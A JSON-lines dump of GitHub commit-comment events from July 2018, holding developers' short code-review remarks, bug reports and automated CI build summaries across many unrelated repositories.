{"id":"8017855384","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29832182,"position":null,"line":null,"path":null,"commit_id":"bbb653648512631ff3be29b7652fdad16479e97a","created_at":"2018-07-25T17:12:47Z","updated_at":"2018-07-25T17:12:47Z","author_association":"CONTRIBUTOR","body":"Ne t'inquiète pas, je crois que j'ai parcouru tous les fichiers au moins une fois par jour. J'essayerai de faire un PR avec des TODO si j'en détecte. Pour l'instant je vais attaquer les RulePacks"}},"created_at":"2018-07-25T17:12:47Z"}
{"id":"8017856957","type":"CommitCommentEvent","actor":{"login":"julianmateu"},"repo":{"name":"ekumenlabs/leonardo_turtlebot"},"payload":{"comment":{"id":29832186,"position":13,"line":13,"path":"README.md","commit_id":"b31365511b8bcddf105873b8d840d4d9ae2afc14","created_at":"2018-07-25T17:13:07Z","updated_at":"2018-07-25T17:13:07Z","author_association":"COLLABORATOR","body":"nite: \"these lines\""}},"created_at":"2018-07-25T17:13:07Z"}
{"id":"8017857816","type":"CommitCommentEvent","actor":{"login":"arandomic"},"repo":{"name":"F0xxie/projectX"},"payload":{"comment":{"id":29832188,"position":6,"line":4,"path":".gitignore","commit_id":"ee1d31fb52c77639c979474e983de6a5218d30ca","created_at":"2018-07-25T17:13:16Z","updated_at":"2018-07-25T17:13:16Z","author_association":"CONTRIBUTOR","body":"Заигнорь еще /target\r\n"}},"created_at":"2018-07-25T17:13:16Z"}
{"id":"8017858124","type":"CommitCommentEvent","actor":{"login":"djaiss"},"repo":{"name":"monicahq/monica"},"payload":{"comment":{"id":29832189,"position":5,"line":245,"path":"database/seeds/FakeContentTableSeeder.php","commit_id":"a95d0f33684fc419bf142dd37edbaf640c408609","created_at":"2018-07-25T17:13:20Z","updated_at":"2018-07-25T17:13:20Z","author_association":"MEMBER","body":"This doesn't work. dateTimeThisYear returns a DateTime object, not a Carbon instance."}},"created_at":"2018-07-25T17:13:20Z"}
{"id":"8017858193","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29832190,"position":null,"line":null,"path":null,"commit_id":"dc1be07940dda6ee1faa9db1bc6505da7a00dc2f","created_at":"2018-07-25T17:13:21Z","updated_at":"2018-07-25T17:13:21Z","author_association":"NONE","body":"Yes several have tried test of this type with using undefined attackedBy. But not all of them were catched before approving:-)"}},"created_at":"2018-07-25T17:13:21Z"}
{"id":"8017860494","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"mellery451/rippled"},"payload":{"comment":{"id":29832198,"position":null,"line":null,"path":null,"commit_id":"7b7c4cb4e00af0130b0bf1efef50826d1ea2cd07","created_at":"2018-07-25T17:13:49Z","updated_at":"2018-07-25T17:13:49Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/mellery451/rippled/commit/7b7c4cb4e00af0130b0bf1efef50826d1ea2cd07)\n\nBuilt at __20180725 - 17:13:49__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 595s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/coverage.txt) | 1035 cases, 0 failed, t: 700s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 837s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 256s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 225s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 502s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 253s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 460s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 343s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1295s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 252s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 361s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sqltune/1//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 541s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-25T17:13:49Z"}
{"id":"8017865765","type":"CommitCommentEvent","actor":{"login":"meleg"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29832215,"position":null,"line":null,"path":null,"commit_id":"59b2c1285d08c953525418fd986ed6e40c415598","created_at":"2018-07-25T17:14:54Z","updated_at":"2018-07-25T17:14:54Z","author_association":"CONTRIBUTOR","body":"Notice that, after this commit, the some tests fail. In particular I added the (dispatch of the) function compute_Mlincomb at the end of NEPtypes.jl \r\n\r\nThis speed up a lot (more then 10x) the function compute_Mlincomb for the input that is a DEP.\r\n\r\nHowever, this change makes fail the Newton methods although all the other tests pass. Therefore I strongly suspect that there is an error in the Newton functions but there could be an error in compute_Mlincomb.\r\n\r\nShort story: if you want the test to pass just comment compute_Mlincomb at the end of NEPtypes.jl otherwise you are welcome to look for the bug.\r\n\r\nI will try to fix this before the end of the week."}},"created_at":"2018-07-25T17:14:54Z"}
{"id":"8017865833","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"airbnb/enzyme"},"payload":{"comment":{"id":29832216,"position":null,"line":null,"path":null,"commit_id":"d114e6894094cc737ee73dcc7dc4092edbe2e41f","created_at":"2018-07-25T17:14:55Z","updated_at":"2018-07-25T17:14:55Z","author_association":"MEMBER","body":"When it's ready. See #1723 as well."}},"created_at":"2018-07-25T17:14:55Z"}
{"id":"8017866568","type":"CommitCommentEvent","actor":{"login":"shailiej"},"repo":{"name":"marccampbell/help-center"},"payload":{"comment":{"id":29832218,"position":12,"line":12,"path":"content/docs/vendor-rbac/examples.md","commit_id":"54ece1d0a6046bb5bd806ed949e151b31b9e76a8","created_at":"2018-07-25T17:15:04Z","updated_at":"2018-07-25T17:15:04Z","author_association":"NONE","body":"releass => releases"}},"created_at":"2018-07-25T17:15:04Z"}
{"id":"8017867154","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29832222,"position":null,"line":null,"path":null,"commit_id":"eb29d534635e11c3678ef03905532d9bce3ac604","created_at":"2018-07-25T17:15:11Z","updated_at":"2018-07-25T17:15:11Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-943](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-943).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-943-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T17:15:11Z"}
{"id":"8017868759","type":"CommitCommentEvent","actor":{"login":"wrabcak"},"repo":{"name":"fedora-selinux/selinux-policy-contrib"},"payload":{"comment":{"id":29832226,"position":null,"line":null,"path":null,"commit_id":"28dd62cff35bfdb13046cd4785b1f345b611c2c7","created_at":"2018-07-25T17:15:29Z","updated_at":"2018-07-25T17:15:29Z","author_association":"MEMBER","body":"Make sense.\r\n\r\nThanks."}},"created_at":"2018-07-25T17:15:29Z"}
{"id":"8017870295","type":"CommitCommentEvent","actor":{"login":"djaiss"},"repo":{"name":"monicahq/monica"},"payload":{"comment":{"id":29832231,"position":5,"line":245,"path":"database/seeds/FakeContentTableSeeder.php","commit_id":"a95d0f33684fc419bf142dd37edbaf640c408609","created_at":"2018-07-25T17:15:48Z","updated_at":"2018-07-25T17:15:48Z","author_association":"MEMBER","body":"@asbiin "}},"created_at":"2018-07-25T17:15:48Z"}
{"id":"8017870692","type":"CommitCommentEvent","actor":{"login":"Miguelito777"},"repo":{"name":"ionic-team/ionic-cli"},"payload":{"comment":{"id":29832232,"position":null,"line":null,"path":null,"commit_id":"08dba217e3c091b197593fdd6a57cb360b68183a","created_at":"2018-07-25T17:15:53Z","updated_at":"2018-07-25T17:15:53Z","author_association":"NONE","body":"Excellent!\r\nWe were waiting for it!"}},"created_at":"2018-07-25T17:15:53Z"}
{"id":"8017884432","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29832256,"position":5,"line":15,"path":"gpytorch/lazy/constant_mul_lazy_variable.py","commit_id":"149468cb6eb7bfe860c11396faf8ea47aa5f9bb7","created_at":"2018-07-25T17:18:36Z","updated_at":"2018-07-25T17:18:36Z","author_association":"COLLABORATOR","body":"https://github.com/pytorch/pytorch/issues/7277#issuecomment-407830351"}},"created_at":"2018-07-25T17:18:36Z"}
{"id":"8017885825","type":"CommitCommentEvent","actor":{"login":"ihahachi"},"repo":{"name":"ionic-team/ionic"},"payload":{"comment":{"id":29832262,"position":null,"line":null,"path":null,"commit_id":"0db643df450a6083f5b5a8031f56e720ab933775","created_at":"2018-07-25T17:18:53Z","updated_at":"2018-07-25T17:18:53Z","author_association":"NONE","body":"Wow 😍 "}},"created_at":"2018-07-25T17:18:53Z"}
{"id":"8017894788","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29832279,"position":null,"line":null,"path":null,"commit_id":"ad8c9b366e99d012fbb7bb3381ee7b42aaaf1271","created_at":"2018-07-25T17:20:35Z","updated_at":"2018-07-25T17:20:35Z","author_association":"COLLABORATOR","body":"<h3>Remove null from signature of formatDate (#2724) (#2725)</h3>\n\nPreview: <strong><a href='https://19140-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19140-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19140-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-25T17:20:35Z"}
{"id":"8017894921","type":"CommitCommentEvent","actor":{"login":"ch4rlie1"},"repo":{"name":"ch4rlie1/JavaFXPracticeFibonacci"},"payload":{"comment":{"id":29832280,"position":null,"line":null,"path":null,"commit_id":"cd16453dcf5c5930296b278f5062edf91f320840","created_at":"2018-07-25T17:20:37Z","updated_at":"2018-07-25T17:20:37Z","author_association":"OWNER","body":"Created README"}},"created_at":"2018-07-25T17:20:37Z"}
{"id":"8017895966","type":"CommitCommentEvent","actor":{"login":"medicshort87"},"repo":{"name":"kaelfischer/max31856-nodered"},"payload":{"comment":{"id":29832282,"position":null,"line":null,"path":null,"commit_id":"154835e793184be6d362627d607d6f6af369a6a2","created_at":"2018-07-25T17:20:49Z","updated_at":"2018-07-25T17:20:49Z","author_association":"NONE","body":"How is this able to be installed in Node-Red to set up in UI? I have tried many ways and am still unable. "}},"created_at":"2018-07-25T17:20:49Z"}
{"id":"8017906563","type":"CommitCommentEvent","actor":{"login":"orhankislal"},"repo":{"name":"apache/madlib"},"payload":{"comment":{"id":29832298,"position":27,"line":973,"path":"src/madpack/madpack.py","commit_id":"1fe308c70d2c91fef508d29d81ed0e93da429eb6","created_at":"2018-07-25T17:22:50Z","updated_at":"2018-07-25T17:22:50Z","author_association":"CONTRIBUTOR","body":"Let's say the user has 1.13 installed on a schema, uses rpm to get 1.14 but doesn't run the `madpack upgrade` command and tries the install-check. That will be caught in here and `Versions do not match` is accurate. If we want to check for schema not existing, that is a separate if check. I'll make a new commit to catch it."}},"created_at":"2018-07-25T17:22:50Z"}
{"id":"8017909611","type":"CommitCommentEvent","actor":{"login":"jasonrobson"},"repo":{"name":"jasonrobson/myrubyblog"},"payload":{"comment":{"id":29832300,"position":11,"line":12,"path":"app/controllers/posts_controller.rb","commit_id":"b9e77690bdafa4c10a2415afb8383474ac517e13","created_at":"2018-07-25T17:23:24Z","updated_at":"2018-07-25T17:23:24Z","author_association":"OWNER","body":"feito chefe! o/"}},"created_at":"2018-07-25T17:23:24Z"}
{"id":"8017909759","type":"CommitCommentEvent","actor":{"login":"jasonrobson"},"repo":{"name":"jasonrobson/myrubyblog"},"payload":{"comment":{"id":29832301,"position":8,"line":9,"path":"app/controllers/posts_controller.rb","commit_id":"b9e77690bdafa4c10a2415afb8383474ac517e13","created_at":"2018-07-25T17:23:26Z","updated_at":"2018-07-25T17:23:26Z","author_association":"OWNER","body":"feito chefe! o/"}},"created_at":"2018-07-25T17:23:26Z"}
{"id":"8017910161","type":"CommitCommentEvent","actor":{"login":"Viniciuswps"},"repo":{"name":"Viniciuswps/lab-05"},"payload":{"comment":{"id":29832302,"position":null,"line":null,"path":null,"commit_id":"e449bd7ee195d44ff6a26d29e1217e4651a143ab","created_at":"2018-07-25T17:23:31Z","updated_at":"2018-07-25T17:23:31Z","author_association":"OWNER","body":"Corrigindo os erro apontado pelo monitor : \" Os métodos alterarOrdem() e exibirCenarioOrdenado() implementados de forma incorreta. O alterarOrdem deveria somente alterar o tipo de comarator. Já o exibirCenarioOrdenado() ordenar usando o comparator e em seguida retornar o desejado. Da forma que você implementou, sempre precisariamos chamar o alterarOrdem() antes do exibirCenarioOrdenado()\""}},"created_at":"2018-07-25T17:23:31Z"}
{"id":"8017942032","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29832392,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T17:29:42Z","updated_at":"2018-07-25T17:29:42Z","author_association":"COLLABORATOR","body":"In MLVApp my understanding is this:\r\n- decode raw from MLV\r\n- debayer \r\n(from now apply_processing_object()) \r\n- apply exposure/wb/tint via a precalculated matrix (a kind of 3D lut, calculated in processing.c with the parameters given by the sliders)  \r\n- converting via profile function and gamma function via precalculated (in processing.c) vector (1D lut)\r\n- apply saturation\r\n- apply curves via precalculated (in processing.c) vector (1D lut)\r\n- convert to YCbCr, do chroma blur and sharpening, convert to RGB \r\n     OR do sharpening\r\n- apply LUT\r\n- apply Filter"}},"created_at":"2018-07-25T17:29:42Z"}
{"id":"8017943424","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"neverovda/ruby_learning"},"payload":{"comment":{"id":29832395,"position":43,"line":35,"path":"lesson_3/railway.rb","commit_id":"665a2f9c08d5e65c0c72050505ddeb31b77d0693","created_at":"2018-07-25T17:29:59Z","updated_at":"2018-07-25T17:29:59Z","author_association":"NONE","body":"в этом методе надо возвращать поезда\r\nесли указан тип у метода, то возвращать массив поездов указанного типа, если тип не указан - возвращать все поезда"}},"created_at":"2018-07-25T17:29:59Z"}
{"id":"8017945481","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"neverovda/ruby_learning"},"payload":{"comment":{"id":29832406,"position":53,"line":45,"path":"lesson_3/railway.rb","commit_id":"665a2f9c08d5e65c0c72050505ddeb31b77d0693","created_at":"2018-07-25T17:30:23Z","updated_at":"2018-07-25T17:30:23Z","author_association":"NONE","body":"@list_route - лучше заменить на @stations\r\nтогда понятно о чем речь "}},"created_at":"2018-07-25T17:30:23Z"}
{"id":"8017946715","type":"CommitCommentEvent","actor":{"login":"jahbenjah"},"repo":{"name":"jahbenjah/github-pages-with-jekyll"},"payload":{"comment":{"id":29832422,"position":null,"line":null,"path":null,"commit_id":"50d3f7c2de9d6cc13ce14c6e4c356cc52a0a8f29","created_at":"2018-07-25T17:30:36Z","updated_at":"2018-07-25T17:30:36Z","author_association":"OWNER","body":"closes #3 "}},"created_at":"2018-07-25T17:30:36Z"}
{"id":"8017947564","type":"CommitCommentEvent","actor":{"login":"AdhamAbozaeid"},"repo":{"name":"linux4wilc/driver"},"payload":{"comment":{"id":29832429,"position":null,"line":null,"path":null,"commit_id":"0559b98c8dfc55208d8a64d584a4a6b15f605a74","created_at":"2018-07-25T17:30:46Z","updated_at":"2018-07-25T17:30:46Z","author_association":"CONTRIBUTOR","body":"@PREMjITHT , No, WILC3000 supports BLE only"}},"created_at":"2018-07-25T17:30:46Z"}
{"id":"8017948033","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29832435,"position":99,"line":57,"path":"contracts/Splitter.sol","commit_id":"e7bf72a4462d74ff70a26166e95ef9a732f0dace","created_at":"2018-07-25T17:30:52Z","updated_at":"2018-07-25T17:30:52Z","author_association":"OWNER","body":"oh, sure - thanks"}},"created_at":"2018-07-25T17:30:52Z"}
{"id":"8017949625","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"neverovda/ruby_learning"},"payload":{"comment":{"id":29832442,"position":110,"line":98,"path":"lesson_3/railway.rb","commit_id":"665a2f9c08d5e65c0c72050505ddeb31b77d0693","created_at":"2018-07-25T17:31:12Z","updated_at":"2018-07-25T17:31:12Z","author_association":"NONE","body":"index - это хорошо, а вот @list_route - это уже дублирование данных. Есть же уже @route"}},"created_at":"2018-07-25T17:31:12Z"}
{"id":"8017951542","type":"CommitCommentEvent","actor":{"login":"abstractspace"},"repo":{"name":"ransford/sllurp"},"payload":{"comment":{"id":29832449,"position":null,"line":null,"path":null,"commit_id":"6ce296101afc021f268d3d6582295eb2b6f9ce49","created_at":"2018-07-25T17:31:36Z","updated_at":"2018-07-25T17:31:36Z","author_association":"NONE","body":"I get the following error: \r\n \r\n File \"/usr/local/lib/python2.7/dist-packages/sllurp-0.4.1-py2.7.egg/sllurp/verb/inventory.py\", line 122, in main\r\n    start_time = time.monotonic()\r\nAttributeError: 'module' object has no attribute 'monotonic'\r\n"}},"created_at":"2018-07-25T17:31:36Z"}
{"id":"8017953640","type":"CommitCommentEvent","actor":{"login":"shailiej"},"repo":{"name":"marccampbell/help-center"},"payload":{"comment":{"id":29832451,"position":4,"line":4,"path":"content/docs/vendor-rbac/rule-order.md","commit_id":"54ece1d0a6046bb5bd806ed949e151b31b9e76a8","created_at":"2018-07-25T17:32:00Z","updated_at":"2018-07-25T17:32:00Z","author_association":"NONE","body":"Replicaed => Replicated"}},"created_at":"2018-07-25T17:32:00Z"}
{"id":"8017956785","type":"CommitCommentEvent","actor":{"login":"asbiin"},"repo":{"name":"monicahq/monica"},"payload":{"comment":{"id":29832459,"position":5,"line":245,"path":"database/seeds/FakeContentTableSeeder.php","commit_id":"a95d0f33684fc419bf142dd37edbaf640c408609","created_at":"2018-07-25T17:32:36Z","updated_at":"2018-07-25T17:32:36Z","author_association":"MEMBER","body":"@djaiss OK I'll fix it"}},"created_at":"2018-07-25T17:32:36Z"}
{"id":"8017960789","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29832468,"position":55,"line":40,"path":"contracts/Splitter.sol","commit_id":"bed4dd9077b334892416b8412efcc2e14cff5c61","created_at":"2018-07-25T17:33:27Z","updated_at":"2018-07-25T17:33:27Z","author_association":"OWNER","body":"right, cuz we don't have control over address.balance! okay, thanks much"}},"created_at":"2018-07-25T17:33:27Z"}
{"id":"8017964341","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29832494,"position":6,"line":1667,"path":"resources/definitions/fdmprinter.def.json","commit_id":"5cb5e63dcc41d887c9e6bfa49832fae110611238","created_at":"2018-07-25T17:34:08Z","updated_at":"2018-07-25T17:34:08Z","author_association":"CONTRIBUTOR","body":"should be ```(...)infill_multiplier % 2 == 0```\r\nNote double = as comparison operator, not single = as assignment operator."}},"created_at":"2018-07-25T17:34:08Z"}
{"id":"8017965735","type":"CommitCommentEvent","actor":{"login":"diparthshah"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29832498,"position":4,"line":54,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"6e4febeb827ad9cc4aa5e50fb5b9ebc4cfc309ec","created_at":"2018-07-25T17:34:23Z","updated_at":"2018-07-25T17:34:23Z","author_association":"OWNER","body":"So, `netLogoHintHelper` should be working independently and should return `from,to,list`. netLogoHintHelper should be called in registerhelper which resides in `complete` event."}},"created_at":"2018-07-25T17:34:23Z"}
{"id":"8017966976","type":"CommitCommentEvent","actor":{"login":"diparthshah"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29832502,"position":17,"line":67,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"6e4febeb827ad9cc4aa5e50fb5b9ebc4cfc309ec","created_at":"2018-07-25T17:34:39Z","updated_at":"2018-07-25T17:34:39Z","author_association":"OWNER","body":"Alright."}},"created_at":"2018-07-25T17:34:39Z"}
{"id":"8017967775","type":"CommitCommentEvent","actor":{"login":"diparthshah"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29832506,"position":22,"line":72,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"6e4febeb827ad9cc4aa5e50fb5b9ebc4cfc309ec","created_at":"2018-07-25T17:34:48Z","updated_at":"2018-07-25T17:34:48Z","author_association":"OWNER","body":"Okay."}},"created_at":"2018-07-25T17:34:48Z"}
{"id":"8017970688","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832515,"position":63,"line":66,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:35:23Z","updated_at":"2018-07-25T17:35:23Z","author_association":"NONE","body":"No need to do that expensive check, see below."}},"created_at":"2018-07-25T17:35:23Z"}
{"id":"8017971686","type":"CommitCommentEvent","actor":{"login":"patrikjuvonen"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29832517,"position":null,"line":null,"path":null,"commit_id":"9796b3ecbfee879cade631a22f5268825abdc6b1","created_at":"2018-07-25T17:35:36Z","updated_at":"2018-07-25T17:35:36Z","author_association":"COLLABORATOR","body":"I'm receiving a build error once this commit is applied:\r\n\r\n**Severity:** Error\r\n**Code:** [C3668](http://msdn.microsoft.com/query/dev15.query?appId=Dev15IDEF1&l=EN-US&k=k(C3668)&rd=true)\r\n**Description:** 'CWebView::OnBeforeBrowse': method with override specifier 'override' did not override any base class methods\r\n**Project:** Client Webbrowser\r\n**File:** `[...]\\mtasa-blue\\client\\cefweb\\cwebview.h`\r\n**Line:** 132\r\n**About Microsoft Visual Studio**:\r\n```\r\nMicrosoft Visual Studio Community 2017 \r\nVersion 15.7.5\r\nVisualStudio.15.Release/15.7.5+27703.2042\r\nMicrosoft .NET Framework\r\nVersion 4.7.03056\r\n\r\nInstalled Version: Community\r\n\r\nVisual C++ 2017   00369-60000-00001-AA478\r\nMicrosoft Visual C++ 2017\r\n\r\nASP.NET and Web Tools 2017   15.0.40625.0\r\nASP.NET and Web Tools 2017\r\n\r\nC# Tools   2.8.3-beta6-63029-08. Commit Hash: e9a3a6c0ba5b1fde8b1fff964bdfb3fb768ee2eb\r\nC# components used in the IDE. Depending on your project type and settings, a different version of the compiler may be used.\r\n\r\nClangFormat   1.0\r\nFormats code by calling the clang-format executable.\r\n\r\nCommon Azure Tools   1.10\r\nProvides common services for use by Azure Mobile Services and Microsoft Azure Tools.\r\n\r\nGitHub.VisualStudio   2.5.4.3349\r\nA Visual Studio Extension that brings the GitHub Flow into Visual Studio.\r\n\r\nJavaScript Language Service   2.0\r\nJavaScript Language Service\r\n\r\nMicrosoft JVM Debugger   1.0\r\nProvides support for connecting the Visual Studio debugger to JDWP compatible Java Virtual Machines\r\n\r\nMicrosoft MI-Based Debugger   1.0\r\nProvides support for connecting Visual Studio to MI compatible debuggers\r\n\r\nMicrosoft Visual C++ Wizards   1.0\r\nMicrosoft Visual C++ Wizards\r\n\r\nMicrosoft Visual Studio VC Package   1.0\r\nMicrosoft Visual Studio VC Package\r\n\r\nNuGet Package Manager   4.6.0\r\nNuGet Package Manager in Visual Studio. For more information about NuGet, visit http://docs.nuget.org/.\r\n\r\nProjectServicesPackage Extension   1.0\r\nProjectServicesPackage Visual Studio Extension Detailed Info\r\n\r\nReAttach   2.2\r\nGives you an easy way to ReAttach to prior debugging targets. For more information, see https://marketplace.visualstudio.com/items?itemName=ErlandR.ReAttach.\r\n\r\nResourcePackage Extension   1.0\r\nResourcePackage Visual Studio Extension Detailed Info\r\n\r\nWindows Machine Learning Generator Extension   1.0\r\nWindows Machine Learning Visual Studio Extension Detailed Info\r\n\r\nVisual Basic Tools   2.8.3-beta6-63029-08. Commit Hash: e9a3a6c0ba5b1fde8b1fff964bdfb3fb768ee2eb\r\nVisual Basic components used in the IDE. Depending on your project type and settings, a different version of the compiler may be used.\r\n\r\nVisual Studio Code Debug Adapter Host Package   1.0\r\nInterop layer for hosting Visual Studio Code debug adapters in Visual Studio\r\n\r\nVisual Studio Tools for CMake   1.0\r\nVisual Studio Tools for CMake\r\n```"}},"created_at":"2018-07-25T17:35:36Z"}
{"id":"8017972285","type":"CommitCommentEvent","actor":{"login":"tdondich"},"repo":{"name":"rreckonerr/webpack.js.org"},"payload":{"comment":{"id":29832521,"position":null,"line":null,"path":null,"commit_id":"645b5001a9969c2f3a0de238af1a2d32cd259a47","created_at":"2018-07-25T17:35:42Z","updated_at":"2018-07-25T17:35:42Z","author_association":"NONE","body":"Woop!"}},"created_at":"2018-07-25T17:35:42Z"}
{"id":"8017972397","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29832522,"position":111,"line":149,"path":"device/sensor/drv/drv_tvoc_sensirion_sgp30.c","commit_id":"2baa9063087dff9faab2d04ccaaa7676eddaf60c","created_at":"2018-07-25T17:35:44Z","updated_at":"2018-07-25T17:35:44Z","author_association":"NONE","body":"why & 0x7? product id is `data[0] >> 4`"}},"created_at":"2018-07-25T17:35:44Z"}
{"id":"8017972637","type":"CommitCommentEvent","actor":{"login":"ghostrider-reborn"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29832524,"position":null,"line":null,"path":null,"commit_id":"603840139174110eb25d1e36162781fb966fb0d9","created_at":"2018-07-25T17:35:47Z","updated_at":"2018-07-25T17:35:47Z","author_association":"MEMBER","body":"@Akianonymus I dont think it matters\r\nGive it a try"}},"created_at":"2018-07-25T17:35:47Z"}
{"id":"8017972723","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832525,"position":70,"line":72,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:35:48Z","updated_at":"2018-07-25T17:35:48Z","author_association":"NONE","body":"```solidity\r\nelse if (msg.sender == game.commits[1].player) {\r\n} else {\r\n    revert();\r\n}\r\n```"}},"created_at":"2018-07-25T17:35:48Z"}
{"id":"8017974679","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832531,"position":64,"line":67,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:36:10Z","updated_at":"2018-07-25T17:36:10Z","author_association":"NONE","body":"I think `==` to avoid issues."}},"created_at":"2018-07-25T17:36:10Z"}
